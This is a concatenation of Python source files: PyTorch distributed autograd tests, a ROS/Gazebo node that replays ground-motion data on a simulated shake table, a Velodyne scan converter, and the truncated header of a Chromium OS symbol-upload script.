@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
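# Build a chain of torch.add RPCs across all other ranks so that every
# worker participates in the backward pass.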
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call the custom function in the middle of the backward pass to ensure
# all nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
# Need at least one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
# only have `num_current_backward_passes` and `num_autograd_contexts`
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
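# Forward the matmul over another RPC hop so the backward pass has to
# traverse a nested RPC.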
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check that a and b use different grad buffers
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contiguous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
# check that a and b use different grad buffers
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
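# accumulate_grad_0 fires both hooks (1 + 2) and accumulate_grad_1 fires
# one more (2), so the counter should reach 5 after a single backward pass.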
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
class CudaDistAutogradTest(CommonDistAutogradTest):
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is on GPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still clean up the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could require grad.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class WrapperModule(nn.Module):
def __init__(self, model, device):
super().__init__()
self.model = model.to(device)
def forward(self, *args):
return self.model(*args)
def gradients(self, ctx_id):
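# Return this wrapped model's gradients from the given dist autograd
# context, in parameter order.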
grads = dist_autograd.get_gradients(ctx_id)
return [grads[p] for p in self.model.parameters()]
class TensorPipeCudaDistAutogradTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t1 = torch.rand(10, device=self.rank, requires_grad=True)
t2 = torch.rand(10, device=self.rank, requires_grad=True)
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
dist_autograd.backward(context_id, [res.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(torch.ones(10), grads[t1])
self.assertEqual(torch.ones(10), grads[t2])
self.assertEqual(t1.device, grads[t1].device)
self.assertEqual(t2.device, grads[t2].device)
rpc.shutdown()
class MyRemoteCompute(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, input):
input = input * 2.0
return input
class MyLocalCompute(torch.nn.Module):
def __init__(self, next_stage):
super().__init__()
self.next_stage = next_stage
def forward(self, input):
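# Delegate the forward pass to the remote stage via a synchronous RRef RPC.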
return self.next_stage.rpc_sync().forward(input)
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
remote_compute = rpc.remote(dst, TensorPipeCudaDistAutogradTest.MyRemoteCompute)
local_compute = TensorPipeCudaDistAutogradTest.MyLocalCompute(remote_compute)
for _ in range(10):
input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
# Run local autograd
result = input * 2.0
r = random.random()
loss = result.sum() * r
loss.backward()
# Run distributed autograd
with dist_autograd.context() as context_id:
result = local_compute(input)
loss = result.sum() * r
dist_autograd.backward(context_id, [loss])
# Compare grads.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(input.grad, grads[input])
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_gradients_synchronizations(self):
options = self.rpc_backend_options
for peer_rank in range(self.world_size):
options.set_device_map(worker_name(peer_rank), {self.rank: peer_rank})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# this is master
layers = [nn.Linear(2000, 2000) for _ in range(self.world_size - 1)]
local_layers = [l.to(0) for l in layers]
remote_layers = []
for rank in range(1, self.world_size):
remote_layers.append(rpc.remote(
worker_name(rank),
WrapperModule,
args=(layers[rank - 1], rank)
))
x = torch.randn(5000, 2000).to(0)
# local iteration
local_model = nn.Sequential(*local_layers)
local_model(x).sum().backward()
# remote iteration
with dist_autograd.context() as context_id:
for remote_layer in remote_layers:
x = remote_layer.rpc_sync().forward(x)
dist_autograd.backward(context_id, [x.sum()])
futs = []
for remote_layer in remote_layers:
futs.append(remote_layer.rpc_async().gradients(context_id))
for i in range(len(futs)):
local_gradients = [p.grad for p in local_layers[i].parameters()]
for g1, g2 in zip(futs[i].wait(), local_gradients):
self.assertEqual(g1, g2)
rpc.shutdown()
|
motion_from_file.py
|
#! /usr/bin/env python
from __future__ import print_function
import rospy
from std_msgs.msg import Float64
from sensor_msgs.msg import JointState
import actionlib
import pbr_gazebo.msg
from threading import Thread
from collections import deque
import numpy as np
import rospkg
import os
import csv
from gazebo_msgs.msg import LinkStates
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Twist
class MotionFromFile(object):
def __init__(self, file_name, link_name='double_rock::box'):
self.link_name = link_name
rospack = rospkg.RosPack()
rospack.list()
pkg_path = rospack.get_path('pbr_gazebo')
self.file_name = os.path.join(pkg_path, 'src/ground_motion_data', file_name)
times = []
self.vel_commands = []
with open(self.file_name, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
t = float(row['time'])
a = float(row['filtered_acc'])
v = float(row['filtered_velocity'])
d = float(row['displacement'])
times.append(t)
self.vel_commands.append(v)
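# Convert the absolute timestamps into per-step durations; playback sleeps
# for each duration between consecutive velocity commands.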
self.times = []
for i in range(len(times) - 1):
self.times.append(times[i+1] - times[i])
# link state and joint state subscribers
rospy.Subscriber('/gazebo/link_states', LinkStates, self.LinkStatecallback)
self.default_vel = 0.0
self.x = 0
rospy.Subscriber("/prismatic_box_controller/joint_states", JointState, self.jointstate_cb)
self.double_rock_twist_pub = rospy.Publisher('/motion_from_file/double_rock/twist', Twist, queue_size=10)
self.double_rock_pose_pub = rospy.Publisher('/motion_from_file/double_rock/pose', Pose, queue_size=10)
# velocity controller
self.Hz = 1000
self.vel_pub = rospy.Publisher('/prismatic_box_controller/prismatic_joint_controller/command', Float64,
queue_size=10)
self.vel_command = self.default_vel
self.vel_thread = Thread(target=self.send_vel, args=())
self.vel_thread.daemon = True
self.vel_thread.start()
# pulse motion action server
self._feedback = pbr_gazebo.msg.AFFeedback()
self._result = pbr_gazebo.msg.AFResult()
self._as = actionlib.SimpleActionServer('ground_motion_server', pbr_gazebo.msg.AFAction, execute_cb=self.execute_cb, auto_start=False)
self._as.start()
rospy.loginfo("pulse_motion_planner/ground_motion_server" + " has been initialized!")
def execute_cb(self, goal):
A = goal.A
F = goal.F
rate = rospy.Rate(self.Hz) # Hz
if A*F == 0:
# reset
err = - self.x
errs = deque(maxlen=5)
errs.append(0)
P = 1
I = 0.2
while abs(err)>0.001:
self.vel_command = P*err + I*np.array(errs).mean()
rate.sleep()
err = - self.x
errs.append(err)
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('reset completed')
else:
step_nm = len(self.times)
print(step_nm)
for j in range(step_nm):
self.vel_command = self.vel_commands[j]
rospy.sleep(self.times[j])
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('ground motion completed')
def jointstate_cb(self, data):
# this is from the ros_controller. It's not ground truth
self.x = data.position[0]
def LinkStatecallback(self, data):
idx = data.name.index(self.link_name)
double_rock_pose = data.pose[idx]
double_rock_twist = data.twist[idx]
self.double_rock_twist_pub.publish(double_rock_twist)
self.double_rock_pose_pub.publish(double_rock_pose)
def send_vel(self):
rate = rospy.Rate(self.Hz) # Hz
while not rospy.is_shutdown():
self.vel_pub.publish(self.vel_command)
rate.sleep()
if __name__ == '__main__':
rospy.init_node('motion_from_file', anonymous=False)
double_rock = 'double_rock::box'
shake_table = 'prismatic_large_box::box'
mff = MotionFromFile('RSN316.csv', shake_table)
try:
rospy.spin()
except rospy.ROSInterruptException:
print("Node killed!")
|
convert_velo_txt2bin.py
|
import argparse
import glob
import multiprocessing
import os
import sys
import time
import numpy as np
import tqdm
dname = os.path.dirname(__file__)
module_dir = os.path.abspath("{}/deeplio".format(dname))
content_dir = os.path.abspath("{}/..".format(dname))
sys.path.append(dname)
sys.path.append(module_dir)
sys.path.append(content_dir)
from deeplio.common import utils
def convert_txt_to_bin(velo_file):
velo_bin = velo_file.replace('.txt', '.npy')
frame = utils.load_velo_scan(velo_file)
np.save(velo_bin, frame)
def convert(args):
for p in args['path']:
print("Converting {}".format(p))
velo_files = np.array(glob.glob("{}/*.txt".format(p)))
num_files = len(velo_files)
        processes = []
for i in tqdm.tqdm(range(0, num_files)):
            p = multiprocessing.Process(target=convert_txt_to_bin, args=(velo_files[i],))
processes.append(p)
p.start()
            # give the cpu some time to finish some of the converting processes
if i % 15 == 0:
time.sleep(0.5)
for process in processes:
process.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='DeepLIO Training')
# Device Option
parser.add_argument('-p', '--path', nargs="+", help='path or a list paths to velodyne text files', required=True)
args = vars(parser.parse_args())
convert(args)
print("done!")
|
upload_symbols.py
|
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Upload all debug symbols required for crash reporting purposes.
This script need only be used to upload release builds symbols or to debug
